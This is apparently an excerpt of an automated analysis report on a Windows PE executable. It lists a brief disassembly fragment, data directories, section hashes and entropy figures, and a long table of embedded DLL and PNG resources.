                                                                                                                                                                                                                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                                                                                                                                                  sub esp, 20h
                                                                                                                                                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                                                                                                                                                  lea eax, dword ptr [000976C7h]
                                                                                                                                                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                                                                                                                                                  mov ebx, ecx
                                                                                                                                                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                                                                                                                                                  mov dword ptr [ecx], eax
                                                                                                                                                                                                                                                                                                                                                                                                                  test dl, 00000001h
                                                                                                                                                                                                                                                                                                                                                                                                                  je 00007FD1D125244Ch
                                                                                                                                                                                                                                                                                                                                                                                                                  mov edx, 00000018h
                                                                                                                                                                                                                                                                                                                                                                                                                  call 00007FD1D108B05Fh
                                                                                                                                                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                                                                                                                                                  mov eax, ebx
                                                                                                                                                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                                                                                                                                                  add esp, 20h
                                                                                                                                                                                                                                                                                                                                                                                                                  pop ebx
                                                                                                                                                                                                                                                                                                                                                                                                                  ret
                                                                                                                                                                                                                                                                                                                                                                                                                  int3
                                                                                                                                                                                                                                                                                                                                                                                                                  inc eax
                                                                                                                                                                                                                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                                                                                                                                                  sub esp, 30h
                                                                                                                                                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+20h], FFFFFFFEh
                                                                                                                                                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+40h], ebx
                                                                                                                                                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+48h], esi
                                                                                                                                                                                                                                                                                                                                                                                                                  mov edx, 00000FA0h
                                                                                                                                                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                                                                                                                                                  lea ecx, dword ptr [000FC48Bh]
                                                                                                                                                                                                                                                                                                                                                                                                                  call dword ptr [0003AA55h]
                                                                                                                                                                                                                                                                                                                                                                                                                  nop
                                                                                                                                                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                                                                                                                                                  lea ecx, dword ptr [000976ADh]
                                                                                                                                                                                                                                                                                                                                                                                                                  call dword ptr [0003AB1Fh]
                                                                                                                                                                                                                                                                                                                                                                                                                  nop
                                                                                                                                                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                                                                                                                                                  mov ebx, eax
                                                                                                                                                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                                                                                                                                                                                                                                  jne 00007FD1D125245Ch
                                                                                                                                                                                                                                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                                                                                                                                                                                                                                  lea ecx, dword ptr [000409FFh]
                                                                                                                                                                                                                                                                                                                                                                                                                  call dword ptr [00000009h]

                                                                                                                                                                                                                                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2b46500x1a4.rdata
                                                                                                                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e10000x18ced0.rsrc
                                                                                                                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2c90000x17ef8.pdata
                                                                                                                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x276a400x70.rdata
                                                                                                                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x276bb00x28.rdata
                                                                                                                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x276ab00x100.rdata
                                                                                                                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x2050000x1598.rdata
                                                                                                                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                                                                                                                                                  Sections

                                                                                                                                                                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                                                                                                                                  .text0x10000x203a840x203c0055b33a0057eb1249062d404be6f3c191unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                                                                                                  .rdata0x2050000xb3d380xb3e00ff7e3f5077be3fcdc08c5cefe3b61d4cFalse0.2822516721681723data4.503762467408248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                                                                                                  .data0x2b90000xff280x82002f1ce6f3cad070fb35415b8819bef07cFalse0.19435096153846154DIY-Thermocam raw data (Lepton 2.x), scale -10205-9792, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 214.2548684.149010331740686IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                                                                                                                                  .pdata0x2c90000x17ef80x180008bf150e7a62f97a619c3cdc82be98ce0False0.5033976236979166data6.127219429376976IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                                                                                                  .rsrc0x2e10000x18ced00x18d0009c8c5f222f38bacdf70cf40cfe0a5854False0.5891008737405542data7.435885059265607IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                                                                                                                  .reloc0x46e0000x9e0000x9d0000a7ec46257812d1e3d4161a390673ed1False0.8984857061106688data7.909171977386322IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                                                                                                                                                                                                  Resources

                                                                                                                                                                                                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                                                                                                                                  DLL0x2f59280x1b600PE32 executable (DLL) (GUI) Intel 80386, for MS WindowsEnglishUnited States0.4680543664383562
                                                                                                                                                                                                                                                                                                                                                                                                                  DLL0x310f280x1de00PE32+ executable (DLL) (GUI) x86-64, for MS WindowsEnglishUnited States0.46928118462343094
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x338d080x77PNG image data, 4 x 4, 8-bit/color RGB, non-interlacedEnglishUnited States0.9915966386554622
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3356480x2f5PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0145310435931307
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x335bc80x301PNG image data, 70 x 31, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0143042912873863
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3359400x287PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.017001545595054
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3385b80x36ePNG image data, 22 x 40, 8-bit/color RGB, non-interlacedEnglishUnited States1.0125284738041003
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3374d00x15dPNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0315186246418337
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3376300x13ePNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0345911949685536
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3377700x115PNG image data, 30 x 24, 8-bit/color RGB, non-interlacedEnglishUnited States1.03971119133574
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3378880x12aPNG image data, 20 x 40, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0302013422818792
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3372c00x20cPNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.0209923664122138
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x338c080xfdPNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.0276679841897234
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3389280xa6PNG image data, 7 x 7, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3389d00x7cPNG image data, 3 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9919354838709677
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x338a500x96PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.0133333333333334
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x338ae80x91PNG image data, 9 x 8, 8-bit/color RGB, non-interlacedEnglishUnited States1.006896551724138
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x338b800x84PNG image data, 15 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States0.9848484848484849
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34c7d00xa3PNG image data, 7 x 7, 8-bit/color RGB, non-interlacedEnglishUnited States1.0122699386503067
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3482180x771PNG image data, 13 x 156, 8-bit/color RGB, non-interlacedEnglishUnited States1.005774278215223
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x342bb80x697PNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.006520450503853
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3432500x342PNG image data, 30 x 16, 8-bit/color RGBA, non-interlacedEnglishUnited States1.013189448441247
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34c3700x45fPNG image data, 24 x 72, 8-bit/color RGB, non-interlacedEnglishUnited States1.0098302055406614
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x348b600x1a3PNG image data, 20 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.026252983293556
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3457200xac8PNG image data, 24 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0039855072463768
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3461e80x37cPNG image data, 8 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0123318385650224
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3473380xa50PNG image data, 24 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0041666666666667
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x347d880x48ePNG image data, 9 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.009433962264151
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3465680xa50PNG image data, 24 x 132, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0041666666666667
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x346fb80x380PNG image data, 8 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0122767857142858
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x33da700xab0PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0040204678362572
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x33efb00xb1fPNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0038637161924833
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x33e5200xa8ePNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0040710584752035
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x33fad00xb30PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003840782122905
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3416f00x3a6PNG image data, 48 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011777301927195
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x341a980x111bPNG image data, 38 x 114, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0025119890385932
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x343e600x3d1PNG image data, 23 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0112589559877174
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3442380x21bPNG image data, 11 x 88, 8-bit/color RGB, non-interlacedEnglishUnited States1.0204081632653061
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3444580xb12PNG image data, 50 x 273, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003881439661256
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x344f700x7acPNG image data, 50 x 162, 8-bit/color RGBA, non-interlacedEnglishUnited States1.005600814663951
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3409a80xd43PNG image data, 50 x 264, 8-bit/color RGB, non-interlacedEnglishUnited States1.003240058910162
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3406000x3a4PNG image data, 22 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011802575107296
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34c9300x320PNG image data, 14 x 246, 8-bit/color RGBA, non-interlacedEnglishUnited States1.01375
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34cc500x31fPNG image data, 14 x 246, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0137672090112642
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3492500x2bdPNG image data, 15 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0156918687589158
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x348fd80x273PNG image data, 15 x 76, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0175438596491229
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x348d080x2c9PNG image data, 15 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0154277699859748
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3489f80x163PNG image data, 70 x 66, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0112676056338028
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3495100x152PNG image data, 41 x 36, 8-bit/color RGBA, non-interlacedEnglishUnited States1.032544378698225
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3435980x38aPNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0121412803532008
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3439280x532PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082706766917293
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x33b2f80x19cPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8810679611650486
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x33b4980x2296PNG image data, 72 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001242376327084
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3599100x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x35c9500x1c4PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8252212389380531
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x35c4280x522PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.008371385083714
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x359fb00x2475PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000750026786671
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3566c80x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3597480x1c3PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8314855875831486
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3592400x505PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0085603112840467
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x356d680x24d3PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004243131430997
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x35cb180x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x35fbe00x1c7PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.832967032967033
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x35f6a80x536PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082458770614693
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x35d1b80x24f0PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0011632825719121
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3504880x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3533e00x1c5PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8388520971302428
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x352f000x4d9PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.008863819500403
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x350b280x23d3PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34cf700x189PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0279898218829517
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34d1000x1bcPNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States0.7027027027027027
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34d3880x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3502c00x1c4PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.827433628318584
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34fdd00x4efPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0087094220110848
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34da280x23a2PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0007673755755317
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34d2c00xc5PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0253807106598984
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x35fda80x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x362e400x1baPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8212669683257918
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3629580x4e4PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0087859424920127
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3604480x250fPNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0005270369979973
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3535a80x69ePNG image data, 52 x 268, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0064935064935066
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3565000x1c2PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8288888888888889
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3560100x4e9PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0087509944311854
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x353c480x23c6PNG image data, 76 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000436776588775
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34c8780xb5PNG image data, 15 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0165745856353592
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x33d8e80x186PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.028205128205128
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x33d7300x1b5PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States0.6864988558352403
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3489900x66PNG image data, 1 x 46, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9803921568627451
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34a7a80xf9PNG image data, 90 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0321285140562249
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34aba80x17c3PNG image data, 86 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.992931119513398
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34a8a80x283PNG image data, 86 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171073094867806
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34ab300x71PNG image data, 5 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9823008849557522
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x34a0880x71dPNG image data, 16 x 48, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0060406370126305
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3498f00x794PNG image data, 16 x 48, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0056701030927835
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3496680x284PNG image data, 7 x 39, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0170807453416149
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x335ed00x203PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.021359223300971
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3360d80x1b5PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0251716247139588
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3363680xb2PNG image data, 2 x 20, 8-bit/color RGB, non-interlacedEnglishUnited States1.0168539325842696
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3362900xd1PNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9760765550239234
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3364200x21cPNG image data, 21 x 42, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0203703703703704
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3366400x21cPNG image data, 21 x 42, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0203703703703704
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3368600x1aePNG image data, 21 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0186046511627906
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x336a100x13aPNG image data, 16 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0222929936305734
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x336cf80x13fPNG image data, 21 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0344827586206897
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x336e380x135PNG image data, 16 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9967637540453075
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x336b500xdbPNG image data, 21 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0228310502283104
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x336c300xc6PNG image data, 16 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0252525252525253
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x336f700x1a9PNG image data, 21 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0141176470588236
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3371200x19bPNG image data, 16 x 56, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0194647201946472
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x338f200x2296PNG image data, 72 x 125, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001242376327084
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x33b1b80x13ePNG image data, 72 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0345911949685536
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x338e080x115PNG image data, 30 x 24, 8-bit/color RGB, non-interlacedEnglishUnited States1.03971119133574
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x338d800x83PNG image data, 35 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.0076335877862594
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3384e80xcePNG image data, 7 x 7, 8-bit/color RGB, non-interlacedEnglishUnited States1.0242718446601942
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3379b80xb30PNG image data, 22 x 110, 8-bit/color RGBA, non-interlacedEnglishUnited States1.003840782122905
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36b4700x25fPNG image data, 72 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0181219110378912
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36b2580x79PNG image data, 4 x 4, 8-bit/color RGB, non-interlacedEnglishUnited States0.9752066115702479
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x367b100x170PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9755434782608695
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x367d880x26bPNG image data, 70 x 31, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0177705977382876
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x367c800x105PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9731800766283525
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36ad880xe6PNG image data, 22 x 38, 8-bit/color RGB, non-interlacedEnglishUnited States1.0260869565217392
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x369ed00x38dPNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012101210121012
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36a2600x265PNG image data, 55 x 22, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0179445350734095
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36a5780x11aPNG image data, 30 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0319148936170213
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36a4c80xaaPNG image data, 2 x 19, 8-bit/color RGB, non-interlacedEnglishUnited States1.011764705882353
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36a6980x12aPNG image data, 20 x 40, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0268456375838926
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x369cc00x209PNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.021113243761996
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36b1600xf5PNG image data, 10 x 28, 8-bit/color RGB, non-interlacedEnglishUnited States1.0244897959183674
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36c7200xa6PNG image data, 54 x 31, 8-bit/color RGB, non-interlacedEnglishUnited States1.0180722891566265
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36c5d00x150PNG image data, 54 x 124, 8-bit/color RGB, non-interlacedEnglishUnited States1.0327380952380953
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36ae700xacPNG image data, 7 x 7, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0174418604651163
